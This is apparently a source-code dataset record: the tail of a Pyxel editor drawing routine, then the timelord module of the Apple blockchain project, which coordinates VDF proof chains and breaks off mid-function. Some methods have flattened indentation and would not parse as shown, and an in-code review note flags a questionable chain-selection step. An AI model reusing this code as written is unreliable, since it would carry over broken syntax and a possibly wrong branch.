            # Draw overlay cells as tiles on top of the tilemap.
            for i in range(16):
                y = self.y + i * 8 + 1
                for j in range(16):
                    x = self.x + j * 8 + 1
                    val = self._overlay_canvas.data[i, j]
                    if val != OverlayCanvas.COLOR_NONE:
                        sx = (val % 32) * 8
                        sy = (val // 32) * 8
                        pyxel.blt(x, y, self.parent.image, sx, sy, 8, 8)
        else:
            # Image mode: overlay color wins over the underlying image pixel.
            for i in range(16):
                y = self.y + i * 8 + 1
                for j in range(16):
                    x = self.x + j * 8 + 1
                    val = self._overlay_canvas.data[i, j]
                    if val != OverlayCanvas.COLOR_NONE:
                        col = self._overlay_canvas.data[i, j]
                    else:
                        data = pyxel.image(self.parent.image).data
                        col = data[self.viewport_y + i, self.viewport_x + j]
                    pyxel.rect(x, y, 8, 8, col)
        pyxel.line(self.x + 1, self.y + 64, self.x + 128, self.y + 64, 1)
        pyxel.line(self.x + 64, self.y + 1, self.x + 64, self.y + 128, 1)
        if self.parent.tool == TOOL_SELECT and self._select_x1 >= 0:
            pyxel.clip(self.x + 1, self.y + 1, self.x + 128, self.y + 128)
            x = self._select_x1 * 8 + 12
            y = self._select_y1 * 8 + 17
            w = self._select_x2 * 8 - x + 20
            h = self._select_y2 * 8 - y + 25
            pyxel.rectb(x, y, w, h, 15)
            pyxel.rectb(x + 1, y + 1, w - 2, h - 2, 0)
            pyxel.rectb(x - 1, y - 1, w + 2, h + 2, 0)
            pyxel.clip()
    def __on_h_scroll_bar_change(self, value):
        """Horizontal scroll bar moved: reposition the viewport."""
        self.viewport_x = value * 8
    def __on_v_scroll_bar_change(self, value):
        """Vertical scroll bar moved: reposition the viewport."""
        self.viewport_y = value * 8
acdfc41a87a3691c3eaea2e619d962213e914c5f | 51,144 | py | Python | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | apple/timelord/timelord.py | grayfallstown/apple-blockchain | 018041f158ac375f92c67b99f7ff163273407b6c | [
"Apache-2.0"
] | null | null | null | import asyncio
import dataclasses
import io
import logging
import random
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple, Set
from chiavdf import create_discriminant
from apple.consensus.constants import ConsensusConstants
from apple.consensus.pot_iterations import calculate_sp_iters, is_overflow_block
from apple.protocols import timelord_protocol
from apple.protocols.protocol_message_types import ProtocolMessageTypes
from apple.server.outbound_message import NodeType, make_msg
from apple.server.server import AppleServer
from apple.timelord.iters_from_block import iters_from_block
from apple.timelord.timelord_state import LastState
from apple.timelord.types import Chain, IterationType, StateType
from apple.types.blockchain_format.classgroup import ClassgroupElement
from apple.types.blockchain_format.reward_chain_block import RewardChainBlock
from apple.types.blockchain_format.sized_bytes import bytes32
from apple.types.blockchain_format.slots import (
ChallengeChainSubSlot,
InfusedChallengeChainSubSlot,
RewardChainSubSlot,
SubSlotProofs,
)
from apple.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from apple.types.blockchain_format.vdf import VDFInfo, VDFProof
from apple.types.end_of_slot_bundle import EndOfSubSlotBundle
from apple.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
class Timelord:
    def __init__(self, root_path, config: Dict, constants: ConsensusConstants):
        """Initialize timelord bookkeeping; no I/O happens until `_start`."""
        self.config = config
        self.root_path = root_path
        self.constants = constants
        self._shut_down = False
        self.free_clients: List[Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = []
        self.potential_free_clients: List = []
        self.ip_whitelist = self.config["vdf_clients"]["ip"]
        self.server: Optional[AppleServer] = None
        self.chain_type_to_stream: Dict[Chain, Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = {}
        self.chain_start_time: Dict = {}
        # Chains that currently don't have a vdf_client.
        self.unspawned_chains: List[Chain] = [
            Chain.CHALLENGE_CHAIN,
            Chain.REWARD_CHAIN,
            Chain.INFUSED_CHALLENGE_CHAIN,
        ]
        # Chains that currently accept iterations.
        self.allows_iters: List[Chain] = []
        # Last peak received, None if it's already processed.
        self.new_peak: Optional[timelord_protocol.NewPeakTimelord] = None
        # Last end of subslot bundle, None if we built a peak on top of it.
        self.new_subslot_end: Optional[EndOfSubSlotBundle] = None
        # Last state received. Can either be a new peak or a new EndOfSubslotBundle.
        # Unfinished block info, iters adjusted to the last peak.
        self.unfinished_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
        # Signage points iters, adjusted to the last peak.
        self.signage_point_iters: List[Tuple[uint64, uint8]] = []
        # For each chain, send those info when the process spawns.
        self.iters_to_submit: Dict[Chain, List[uint64]] = {}
        self.iters_submitted: Dict[Chain, List[uint64]] = {}
        self.iters_finished: Set = set()
        # For each iteration submitted, know if it's a signage point, an infusion point or an end of slot.
        self.iteration_to_proof_type: Dict[uint64, IterationType] = {}
        # List of proofs finished.
        self.proofs_finished: List[Tuple[Chain, VDFInfo, VDFProof, int]] = []
        # Data to send at vdf_client initialization.
        self.overflow_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
        # Incremented each time `reset_chains` has been called.
        # Used to label proofs in `finished_proofs` and to only filter proofs corresponding to the most recent state.
        self.num_resets: int = 0
        self.process_communication_tasks: List[asyncio.Task] = []
        self.main_loop = None
        self.vdf_server = None
        self._shut_down = False
        self.vdf_failures: List[Tuple[Chain, Optional[int]]] = []
        self.vdf_failures_count: int = 0
        self.vdf_failure_time: float = 0
        self.total_unfinished: int = 0
        self.total_infused: int = 0
        self.state_changed_callback: Optional[Callable] = None
        self.sanitizer_mode = self.config["sanitizer_mode"]
        self.pending_bluebox_info: List[timelord_protocol.RequestCompactProofOfTime] = []
        self.last_active_time = time.time()
    async def _start(self):
        """Start the VDF client server and the main management loop."""
        self.lock: asyncio.Lock = asyncio.Lock()
        self.vdf_server = await asyncio.start_server(
            self._handle_client,
            self.config["vdf_server"]["host"],
            self.config["vdf_server"]["port"],
        )
        self.last_state: LastState = LastState(self.constants)
        # Sanitizer mode compacts existing proofs instead of managing live chains.
        if not self.sanitizer_mode:
            self.main_loop = asyncio.create_task(self._manage_chains())
        else:
            self.main_loop = asyncio.create_task(self._manage_discriminant_queue_sanitizer())
        log.info("Started timelord.")
    def _close(self):
        """Signal shutdown and cancel all outstanding asyncio tasks."""
        self._shut_down = True
        for task in self.process_communication_tasks:
            task.cancel()
        if self.main_loop is not None:
            self.main_loop.cancel()
    async def _await_closed(self):
        """Nothing to wait on; shutdown is fully handled by `_close`."""
        pass
    def set_server(self, server: AppleServer):
        """Attach the node server used for outbound peer messages."""
        self.server = server
    async def _handle_client(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
        """Accept a vdf_client TCP connection if its IP is whitelisted."""
        async with self.lock:
            client_ip = writer.get_extra_info("peername")[0]
            log.debug(f"New timelord connection from client: {client_ip}.")
            if client_ip in self.ip_whitelist:
                self.free_clients.append((client_ip, reader, writer))
                log.debug(f"Added new VDF client {client_ip}.")
                # A reconnect means this IP is no longer "potentially free".
                for ip, end_time in list(self.potential_free_clients):
                    if ip == client_ip:
                        self.potential_free_clients.remove((ip, end_time))
                        break
    async def _stop_chain(self, chain: Chain):
        """Ask the vdf_client running *chain* to stop and release its slot."""
        try:
            # Wait until the chain has finished initializing before stopping it.
            while chain not in self.allows_iters:
                self.lock.release()
                await asyncio.sleep(0.05)
                log.error(f"Trying to stop {chain} before its initialization.")
                await self.lock.acquire()
                if chain not in self.chain_type_to_stream:
                    log.warning(f"Trying to stop a crashed chain: {chain}.")
                    return None
            stop_ip, _, stop_writer = self.chain_type_to_stream[chain]
            self.potential_free_clients.append((stop_ip, time.time()))
            # "010" is the stop command of the vdf_client protocol.
            stop_writer.write(b"010")
            await stop_writer.drain()
            if chain in self.allows_iters:
                self.allows_iters.remove(chain)
            if chain not in self.unspawned_chains:
                self.unspawned_chains.append(chain)
            if chain in self.chain_type_to_stream:
                del self.chain_type_to_stream[chain]
        except ConnectionResetError as e:
            log.error(f"{e}")
    def _can_infuse_unfinished_block(self, block: timelord_protocol.NewUnfinishedBlockTimelord) -> Optional[uint64]:
        """Return the iterations until *block*'s infusion point, or None if the
        block cannot be infused on top of the current state (unknown prior
        reward challenge, infusion point already passed, or another infusion
        before its signage point)."""
        assert self.last_state is not None
        sub_slot_iters = self.last_state.get_sub_slot_iters()
        difficulty = self.last_state.get_difficulty()
        ip_iters = self.last_state.get_last_ip()
        rc_block = block.reward_chain_block
        try:
            block_sp_iters, block_ip_iters = iters_from_block(
                self.constants,
                rc_block,
                sub_slot_iters,
                difficulty,
            )
        except Exception as e:
            log.warning(f"Received invalid unfinished block: {e}.")
            return None
        block_sp_total_iters = self.last_state.total_iters - ip_iters + block_sp_iters
        if is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
            # Overflow blocks signed their SP in the previous sub-slot.
            block_sp_total_iters -= self.last_state.get_sub_slot_iters()
        found_index = -1
        for index, (rc, total_iters) in enumerate(self.last_state.reward_challenge_cache):
            if rc == block.rc_prev:
                found_index = index
                break
        if found_index == -1:
            log.warning(f"Will not infuse {block.rc_prev} because its reward chain challenge is not in the chain")
            return None
        if ip_iters > block_ip_iters:
            log.warning("Too late to infuse block")
            return None
        new_block_iters = uint64(block_ip_iters - ip_iters)
        if len(self.last_state.reward_challenge_cache) > found_index + 1:
            if self.last_state.reward_challenge_cache[found_index + 1][1] < block_sp_total_iters:
                log.warning(
                    f"Will not infuse unfinished block {block.rc_prev} sp total iters {block_sp_total_iters}, "
                    f"because there is another infusion before its SP"
                )
                return None
            if self.last_state.reward_challenge_cache[found_index][1] > block_sp_total_iters:
                if not is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
                    log.error(
                        f"Will not infuse unfinished block {block.rc_prev}, sp total iters: {block_sp_total_iters}, "
                        f"because its iters are too low"
                    )
                return None
        if new_block_iters > 0:
            return new_block_iters
        return None
    async def _reset_chains(self, first_run=False, only_eos=False):
        """Stop all VDF chains and recompute every iteration to submit
        (signage points, infusion points and the end-of-sub-slot) relative
        to the current peak."""
        # First, stop all chains.
        self.last_active_time = time.time()
        log.debug("Resetting chains")
        ip_iters = self.last_state.get_last_ip()
        sub_slot_iters = self.last_state.get_sub_slot_iters()
        if not first_run:
            for chain in list(self.chain_type_to_stream.keys()):
                await self._stop_chain(chain)
        # Adjust all signage points iterations to the peak.
        iters_per_signage = uint64(sub_slot_iters // self.constants.NUM_SPS_SUB_SLOT)
        self.signage_point_iters = [
            (k * iters_per_signage - ip_iters, k)
            for k in range(1, self.constants.NUM_SPS_SUB_SLOT)
            if k * iters_per_signage - ip_iters > 0
        ]
        for sp, k in self.signage_point_iters:
            assert k * iters_per_signage > 0
            assert k * iters_per_signage < sub_slot_iters
        # Adjust all unfinished blocks iterations to the peak.
        new_unfinished_blocks = []
        self.iters_finished = set()
        self.proofs_finished = []
        self.num_resets += 1
        for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
            self.iters_to_submit[chain] = []
            self.iters_submitted[chain] = []
        self.iteration_to_proof_type = {}
        if not only_eos:
            for block in self.unfinished_blocks + self.overflow_blocks:
                new_block_iters: Optional[uint64] = self._can_infuse_unfinished_block(block)
                # Does not add duplicates, or blocks that we cannot infuse
                if new_block_iters and new_block_iters not in self.iters_to_submit[Chain.CHALLENGE_CHAIN]:
                    if block not in self.unfinished_blocks:
                        self.total_unfinished += 1
                    new_unfinished_blocks.append(block)
                    for chain in [Chain.REWARD_CHAIN, Chain.CHALLENGE_CHAIN]:
                        self.iters_to_submit[chain].append(new_block_iters)
                    if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
                        self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(new_block_iters)
                    self.iteration_to_proof_type[new_block_iters] = IterationType.INFUSION_POINT
        # Remove all unfinished blocks that have already passed.
        self.unfinished_blocks = new_unfinished_blocks
        # Signage points.
        if not only_eos and len(self.signage_point_iters) > 0:
            count_signage = 0
            for signage, k in self.signage_point_iters:
                for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
                    self.iters_to_submit[chain].append(signage)
                self.iteration_to_proof_type[signage] = IterationType.SIGNAGE_POINT
                count_signage += 1
                if count_signage == 3:
                    break
        left_subslot_iters = sub_slot_iters - ip_iters
        assert left_subslot_iters > 0
        if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
            self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(left_subslot_iters)
        self.iters_to_submit[Chain.CHALLENGE_CHAIN].append(left_subslot_iters)
        self.iters_to_submit[Chain.REWARD_CHAIN].append(left_subslot_iters)
        self.iteration_to_proof_type[left_subslot_iters] = IterationType.END_OF_SUBSLOT
        for chain, iters in self.iters_to_submit.items():
            for iteration in iters:
                assert iteration > 0
    async def _handle_new_peak(self):
        """Adopt a new peak received from the full node.

        Updates the timelord's tracked state, removes any unfinished/overflow
        blocks that the new peak has just infused, logs infusion statistics,
        and finally resets all VDF chains to run on top of the new peak.
        """
        assert self.new_peak is not None
        self.last_state.set_state(self.new_peak)
        if self.total_unfinished > 0:
            remove_unfinished = []
            for unf_block_timelord in self.unfinished_blocks + self.overflow_blocks:
                # The new peak was built from one of our unfinished blocks;
                # find that block so it can be discarded below.
                if (
                    unf_block_timelord.reward_chain_block.get_hash()
                    == self.new_peak.reward_chain_block.get_unfinished().get_hash()
                ):
                    if unf_block_timelord not in self.unfinished_blocks:
                        # We never got the EOS for this, but we have the block in overflow list
                        self.total_unfinished += 1
                    remove_unfinished.append(unf_block_timelord)
            if len(remove_unfinished) > 0:
                self.total_infused += 1
            for block in remove_unfinished:
                if block in self.unfinished_blocks:
                    self.unfinished_blocks.remove(block)
                if block in self.overflow_blocks:
                    self.overflow_blocks.remove(block)
            # Division is safe: guarded by total_unfinished > 0 above.
            infusion_rate = round(self.total_infused / self.total_unfinished * 100.0, 2)
            log.info(
                f"Total unfinished blocks: {self.total_unfinished}. "
                f"Total infused blocks: {self.total_infused}. "
                f"Infusion rate: {infusion_rate}%."
            )
        self.new_peak = None
        await self._reset_chains()
async def _handle_subslot_end(self):
self.last_state.set_state(self.new_subslot_end)
for block in self.unfinished_blocks:
if self._can_infuse_unfinished_block(block) is not None:
self.total_unfinished += 1
self.new_subslot_end = None
await self._reset_chains()
    async def _map_chains_with_vdf_clients(self):
        """Assign free vdf_client connections to chains awaiting a worker.

        Each loop iteration pops one free client, pairs it with an unspawned
        chain that already has a challenge and an initial form, and spawns the
        communication task for that pair. Stops when either pool is exhausted.
        """
        while not self._shut_down:
            picked_chain = None
            async with self.lock:
                if len(self.free_clients) == 0:
                    break
                ip, reader, writer = self.free_clients[0]
                for chain_type in self.unspawned_chains:
                    challenge = self.last_state.get_challenge(chain_type)
                    initial_form = self.last_state.get_initial_form(chain_type)
                    if challenge is not None and initial_form is not None:
                        picked_chain = chain_type
                        break
                if picked_chain is None:
                    break
                # NOTE(review): this overwrites the chain found by the search
                # above with the first unspawned chain, and the slice below
                # also removes index 0. This is only correct if the ready
                # chain is always at the front of unspawned_chains — confirm.
                picked_chain = self.unspawned_chains[0]
                self.chain_type_to_stream[picked_chain] = (ip, reader, writer)
                self.free_clients = self.free_clients[1:]
                self.unspawned_chains = self.unspawned_chains[1:]
                self.chain_start_time[picked_chain] = time.time()
            log.debug(f"Mapping free vdf_client with chain: {picked_chain}.")
            self.process_communication_tasks.append(
                asyncio.create_task(
                    self._do_process_communication(
                        picked_chain, challenge, initial_form, ip, reader, writer, proof_label=self.num_resets
                    )
                )
            )
async def _submit_iterations(self):
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
if chain in self.allows_iters:
_, _, writer = self.chain_type_to_stream[chain]
for iteration in self.iters_to_submit[chain]:
if iteration in self.iters_submitted[chain]:
continue
log.debug(f"Submitting iterations to {chain}: {iteration}")
assert iteration > 0
prefix = str(len(str(iteration)))
if len(str(iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(iteration)
writer.write(iter_str.encode())
await writer.drain()
self.iters_submitted[chain].append(iteration)
def _clear_proof_list(self, iters: uint64):
return [
(chain, info, proof, label)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations != iters
]
    async def _check_for_new_sp(self, iter_to_look_for: uint64):
        """Broadcast a new signage point once its CC and RC VDFs are both done.

        Looks for finished proofs at *iter_to_look_for* (which must be a
        signage-point iteration), sends a NewSignagePointVDF message to full
        nodes, and queues up to three upcoming signage points for submission.
        """
        signage_iters = [
            iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.SIGNAGE_POINT
        ]
        if len(signage_iters) == 0:
            return None
        to_remove = []
        for potential_sp_iters, signage_point_index in self.signage_point_iters:
            if potential_sp_iters not in signage_iters or potential_sp_iters != iter_to_look_for:
                continue
            signage_iter = potential_sp_iters
            # Only consider proofs from the current reset generation (label).
            proofs_with_iter = [
                (chain, info, proof)
                for chain, info, proof, label in self.proofs_finished
                if info.number_of_iterations == signage_iter and label == self.num_resets
            ]
            # Wait for both cc and rc to have the signage point.
            if len(proofs_with_iter) == 2:
                cc_info: Optional[VDFInfo] = None
                cc_proof: Optional[VDFProof] = None
                rc_info: Optional[VDFInfo] = None
                rc_proof: Optional[VDFProof] = None
                for chain, info, proof in proofs_with_iter:
                    if chain == Chain.CHALLENGE_CHAIN:
                        cc_info = info
                        cc_proof = proof
                    if chain == Chain.REWARD_CHAIN:
                        rc_info = info
                        rc_proof = proof
                if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
                    log.error(f"Insufficient signage point data {signage_iter}")
                    continue
                self.iters_finished.add(iter_to_look_for)
                self.last_active_time = time.time()
                rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
                if rc_info.challenge != rc_challenge:
                    assert rc_challenge is not None
                    log.warning(f"SP: Do not have correct challenge {rc_challenge.hex()}" f" has {rc_info.challenge}")
                    # This proof is on an outdated challenge, so don't use it
                    continue
                # The VDF ran relative to the last infusion point; convert to
                # iterations from the start of the sub-slot before broadcasting.
                iters_from_sub_slot_start = cc_info.number_of_iterations + self.last_state.get_last_ip()
                response = timelord_protocol.NewSignagePointVDF(
                    signage_point_index,
                    dataclasses.replace(cc_info, number_of_iterations=iters_from_sub_slot_start),
                    cc_proof,
                    rc_info,
                    rc_proof,
                )
                if self.server is not None:
                    msg = make_msg(ProtocolMessageTypes.new_signage_point_vdf, response)
                    await self.server.send_to_all([msg], NodeType.FULL_NODE)
                # Cleanup the signage point from memory.
                to_remove.append((signage_iter, signage_point_index))
                self.proofs_finished = self._clear_proof_list(signage_iter)
                # Send the next 3 signage point to the chains.
                next_iters_count = 0
                for next_sp, k in self.signage_point_iters:
                    for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
                        if next_sp not in self.iters_submitted[chain] and next_sp not in self.iters_to_submit[chain]:
                            self.iters_to_submit[chain].append(next_sp)
                    self.iteration_to_proof_type[next_sp] = IterationType.SIGNAGE_POINT
                    next_iters_count += 1
                    if next_iters_count == 3:
                        break
                # Break so we alternate between checking SP and IP
                break
        for r in to_remove:
            self.signage_point_iters.remove(r)
    async def _check_for_new_ip(self, iter_to_look_for: uint64):
        """Broadcast a new infusion point once all required VDFs are done.

        Matches finished proofs at *iter_to_look_for* against one of our
        unfinished blocks, sends a NewInfusionPointVDF to full nodes, and
        builds the resulting NewPeakTimelord state (deficit, sub-epoch
        summary, etc.) which is then handled as a new peak.
        """
        if len(self.unfinished_blocks) == 0:
            return None
        infusion_iters = [
            iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.INFUSION_POINT
        ]
        for iteration in infusion_iters:
            if iteration != iter_to_look_for:
                continue
            # Only proofs from the current reset generation (label) count.
            proofs_with_iter = [
                (chain, info, proof)
                for chain, info, proof, label in self.proofs_finished
                if info.number_of_iterations == iteration and label == self.num_resets
            ]
            # Three proofs are needed when an infused challenge chain exists.
            if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
                chain_count = 3
            else:
                chain_count = 2
            if len(proofs_with_iter) == chain_count:
                block = None
                ip_iters = None
                # Find the unfinished block whose infusion point matches this
                # iteration (relative to the last infusion point).
                for unfinished_block in self.unfinished_blocks:
                    try:
                        _, ip_iters = iters_from_block(
                            self.constants,
                            unfinished_block.reward_chain_block,
                            self.last_state.get_sub_slot_iters(),
                            self.last_state.get_difficulty(),
                        )
                    except Exception as e:
                        log.error(f"Error {e}")
                        continue
                    if ip_iters - self.last_state.get_last_ip() == iteration:
                        block = unfinished_block
                        break
                assert ip_iters is not None
                if block is not None:
                    ip_total_iters = self.last_state.get_total_iters() + iteration
                    challenge = block.reward_chain_block.get_hash()
                    icc_info: Optional[VDFInfo] = None
                    icc_proof: Optional[VDFProof] = None
                    cc_info: Optional[VDFInfo] = None
                    cc_proof: Optional[VDFProof] = None
                    rc_info: Optional[VDFInfo] = None
                    rc_proof: Optional[VDFProof] = None
                    for chain, info, proof in proofs_with_iter:
                        if chain == Chain.CHALLENGE_CHAIN:
                            cc_info = info
                            cc_proof = proof
                        if chain == Chain.REWARD_CHAIN:
                            rc_info = info
                            rc_proof = proof
                        if chain == Chain.INFUSED_CHALLENGE_CHAIN:
                            icc_info = info
                            icc_proof = proof
                    if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
                        log.error(f"Insufficient VDF proofs for infusion point ch: {challenge} iterations:{iteration}")
                        return None
                    rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
                    if rc_info.challenge != rc_challenge:
                        assert rc_challenge is not None
                        log.warning(
                            f"Do not have correct challenge {rc_challenge.hex()} "
                            f"has {rc_info.challenge}, partial hash {block.reward_chain_block.get_hash()}"
                        )
                        # This proof is on an outdated challenge, so don't use it
                        continue
                    self.iters_finished.add(iter_to_look_for)
                    self.last_active_time = time.time()
                    log.debug(f"Generated infusion point for challenge: {challenge} iterations: {iteration}.")
                    overflow = is_overflow_block(self.constants, block.reward_chain_block.signage_point_index)
                    if not self.last_state.can_infuse_block(overflow):
                        log.warning("Too many blocks, or overflow in new epoch, cannot infuse, discarding")
                        return None
                    # Report cc iterations relative to the sub-slot start.
                    cc_info = dataclasses.replace(cc_info, number_of_iterations=ip_iters)
                    response = timelord_protocol.NewInfusionPointVDF(
                        challenge,
                        cc_info,
                        cc_proof,
                        rc_info,
                        rc_proof,
                        icc_info,
                        icc_proof,
                    )
                    msg = make_msg(ProtocolMessageTypes.new_infusion_point_vdf, response)
                    if self.server is not None:
                        await self.server.send_to_all([msg], NodeType.FULL_NODE)
                    self.proofs_finished = self._clear_proof_list(iteration)
                    if (
                        self.last_state.get_last_block_total_iters() is None
                        and not self.last_state.state_type == StateType.FIRST_SUB_SLOT
                    ):
                        # We don't know when the last block was, so we can't make peaks
                        return None
                    sp_total_iters = (
                        ip_total_iters
                        - ip_iters
                        + calculate_sp_iters(
                            self.constants,
                            block.sub_slot_iters,
                            block.reward_chain_block.signage_point_index,
                        )
                        - (block.sub_slot_iters if overflow else 0)
                    )
                    if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
                        is_transaction_block = True
                        height: uint32 = uint32(0)
                    else:
                        last_block_ti = self.last_state.get_last_block_total_iters()
                        assert last_block_ti is not None
                        is_transaction_block = last_block_ti < sp_total_iters
                        height = uint32(self.last_state.get_height() + 1)
                    if height < 5:
                        # Don't directly update our state for the first few blocks, because we cannot validate
                        # whether the pre-farm is correct
                        return None
                    new_reward_chain_block = RewardChainBlock(
                        uint128(self.last_state.get_weight() + block.difficulty),
                        height,
                        uint128(ip_total_iters),
                        block.reward_chain_block.signage_point_index,
                        block.reward_chain_block.pos_ss_cc_challenge_hash,
                        block.reward_chain_block.proof_of_space,
                        block.reward_chain_block.challenge_chain_sp_vdf,
                        block.reward_chain_block.challenge_chain_sp_signature,
                        cc_info,
                        block.reward_chain_block.reward_chain_sp_vdf,
                        block.reward_chain_block.reward_chain_sp_signature,
                        rc_info,
                        icc_info,
                        is_transaction_block,
                    )
                    # Compute the new deficit (number of challenge blocks still
                    # required in this slot) for the resulting peak.
                    if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
                        # Genesis
                        new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
                    elif overflow and self.last_state.deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
                        if self.last_state.peak is not None:
                            assert self.last_state.subslot_end is None
                            # This means the previous block is also an overflow block, and did not manage
                            # to lower the deficit, therefore we cannot lower it either. (new slot)
                            new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
                        else:
                            # This means we are the first infusion in this sub-slot. This may be a new slot or not.
                            assert self.last_state.subslot_end is not None
                            if self.last_state.subslot_end.infused_challenge_chain is None:
                                # There is no ICC, which means we are not finishing a slot. We can reduce the deficit.
                                new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
                            else:
                                # There is an ICC, which means we are finishing a slot. Different slot, so can't change
                                # the deficit
                                new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
                    else:
                        new_deficit = max(self.last_state.deficit - 1, 0)
                    if new_deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
                        last_csb_or_eos = ip_total_iters
                    else:
                        last_csb_or_eos = self.last_state.last_challenge_sb_or_eos_total_iters
                    if self.last_state.just_infused_sub_epoch_summary():
                        new_sub_epoch_summary = None
                        passed_ses_height_but_not_yet_included = False
                    else:
                        new_sub_epoch_summary = block.sub_epoch_summary
                        if new_reward_chain_block.height % self.constants.SUB_EPOCH_BLOCKS == 0:
                            passed_ses_height_but_not_yet_included = True
                        else:
                            passed_ses_height_but_not_yet_included = (
                                self.last_state.get_passed_ses_height_but_not_yet_included()
                            )
                    self.new_peak = timelord_protocol.NewPeakTimelord(
                        new_reward_chain_block,
                        block.difficulty,
                        uint8(new_deficit),
                        block.sub_slot_iters,
                        new_sub_epoch_summary,
                        self.last_state.reward_challenge_cache,
                        uint128(last_csb_or_eos),
                        passed_ses_height_but_not_yet_included,
                    )
                    await self._handle_new_peak()
                    # Break so we alternate between checking SP and IP
                    break
    async def _check_for_end_of_subslot(self, iter_to_look_for: uint64):
        """Build and broadcast an EndOfSubSlotBundle once all chains finish.

        Collects the finished CC, RC and (when present) ICC proofs at
        *iter_to_look_for*, assembles the sub-slot structures, sends the
        NewEndOfSubSlotVDF message, and transitions into the next sub-slot.
        """
        left_subslot_iters = [
            iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.END_OF_SUBSLOT
        ]
        if len(left_subslot_iters) == 0:
            return None
        if left_subslot_iters[0] != iter_to_look_for:
            return None
        # Only proofs from the current reset generation (label) count.
        chains_finished = [
            (chain, info, proof)
            for chain, info, proof, label in self.proofs_finished
            if info.number_of_iterations == left_subslot_iters[0] and label == self.num_resets
        ]
        if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
            chain_count = 3
        else:
            chain_count = 2
        if len(chains_finished) == chain_count:
            icc_ip_vdf: Optional[VDFInfo] = None
            icc_ip_proof: Optional[VDFProof] = None
            cc_vdf: Optional[VDFInfo] = None
            cc_proof: Optional[VDFProof] = None
            rc_vdf: Optional[VDFInfo] = None
            rc_proof: Optional[VDFProof] = None
            for chain, info, proof in chains_finished:
                if chain == Chain.CHALLENGE_CHAIN:
                    cc_vdf = info
                    cc_proof = proof
                if chain == Chain.REWARD_CHAIN:
                    rc_vdf = info
                    rc_proof = proof
                if chain == Chain.INFUSED_CHALLENGE_CHAIN:
                    icc_ip_vdf = info
                    icc_ip_proof = proof
            assert cc_proof is not None and rc_proof is not None and cc_vdf is not None and rc_vdf is not None
            rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
            if rc_vdf.challenge != rc_challenge:
                assert rc_challenge is not None
                log.warning(f"Do not have correct challenge {rc_challenge.hex()} has" f" {rc_vdf.challenge}")
                # This proof is on an outdated challenge, so don't use it
                return None
            log.debug("Collected end of subslot vdfs.")
            self.iters_finished.add(iter_to_look_for)
            self.last_active_time = time.time()
            # Convert cc iterations to be relative to the sub-slot start.
            iters_from_sub_slot_start = cc_vdf.number_of_iterations + self.last_state.get_last_ip()
            cc_vdf = dataclasses.replace(cc_vdf, number_of_iterations=iters_from_sub_slot_start)
            if icc_ip_vdf is not None:
                # The ICC VDF is reported relative to the last challenge block
                # (or previous end-of-slot), so recompute its iteration count.
                if self.last_state.peak is not None:
                    total_iters = (
                        self.last_state.get_total_iters()
                        - self.last_state.get_last_ip()
                        + self.last_state.get_sub_slot_iters()
                    )
                else:
                    total_iters = self.last_state.get_total_iters() + self.last_state.get_sub_slot_iters()
                iters_from_cb = uint64(total_iters - self.last_state.last_challenge_sb_or_eos_total_iters)
                if iters_from_cb > self.last_state.sub_slot_iters:
                    log.error(f"{self.last_state.peak}")
                    log.error(f"{self.last_state.subslot_end}")
                    assert False
                assert iters_from_cb <= self.last_state.sub_slot_iters
                icc_ip_vdf = dataclasses.replace(icc_ip_vdf, number_of_iterations=iters_from_cb)
            icc_sub_slot: Optional[InfusedChallengeChainSubSlot] = (
                None if icc_ip_vdf is None else InfusedChallengeChainSubSlot(icc_ip_vdf)
            )
            if self.last_state.get_deficit() == 0:
                assert icc_sub_slot is not None
                icc_sub_slot_hash = icc_sub_slot.get_hash()
            else:
                icc_sub_slot_hash = None
            next_ses: Optional[SubEpochSummary] = self.last_state.get_next_sub_epoch_summary()
            if next_ses is not None:
